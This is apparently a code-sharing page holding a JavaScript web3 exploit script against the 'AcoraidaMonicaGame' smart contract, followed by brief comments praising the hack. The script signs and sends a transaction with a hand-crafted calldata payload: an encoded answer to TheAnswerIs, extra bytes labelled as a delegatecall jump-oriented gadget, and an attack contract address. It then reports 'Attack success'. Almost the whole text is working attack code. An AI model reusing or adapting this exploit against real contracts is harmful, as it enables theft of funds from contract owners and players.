// 0x5e6
var account = web3.eth.accounts.privateKeyToAccount("0x"+privateKeyAttack.toString('hex'));
console.log("Attack address: "+account.address)
// `payload` is assigned without a declaration, so it becomes an implicit global.
// Layout: 4-byte selector, then the ABI encoding of a one-byte string (offset 0x20,
// length 1, data "r"), then 60 further bytes that are not part of the string argument.
payload = '0x46a3ec67' // TheAnswerIs
payload += '0000000000000000000000000000000000000000000000000000000000000020'
payload += '0000000000000000000000000000000000000000000000000000000000000001' // answer length
payload += '7200000000000000000000000000000000000000000000000000000000000000' // answer "r"
payload += '00000000000000000000000000000000000000000000000009a2' // delegatecall JOP gadget
// The address on the next line is a hard-coded literal; the script does not substitute the
// t.contractAddress value logged above.
payload += '000000000000000000000000d958E2a8d4751665E6292267fA3f436fE13d3265' // <- t.contractAddress (Attack Contract)
payload += '4848';
web3.eth.getTransactionCount(account.address).then(txCount => {
var tx = new Tx({
nonce: txCount,
gasPrice: '0x1',
gasLimit: '0x2DC6C0',
to: '0x3A3AAC709285A54f7E0548b1609B3a8c96d7Fb09', // AcoraidaMonicaGame contract
// 0xde0b6b3a7640001 is 10^18 + 1 wei, i.e. one wei more than the 1 ether that the published
// TheAnswerIs() source requires as a minimum.
value: '0xde0b6b3a7640001', // 1 Ether
from: account.address,
data: payload,
});
tx.sign(privateKeyAttack);
web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex'))
.on('transactionHash', function(hash){
console.log("transactionHash: "+hash);
})
.on('receipt', function(receipt){
// Prints the receipt's status flag and then the full receipt object.
console.log("Attack success: "+receipt.status)
console.log(receipt);
})
.on('error', console.error);
});
});
@souleymane4k

nice work

@iczc

iczc commented Nov 3, 2021

@acyptromillioner

nice hacked
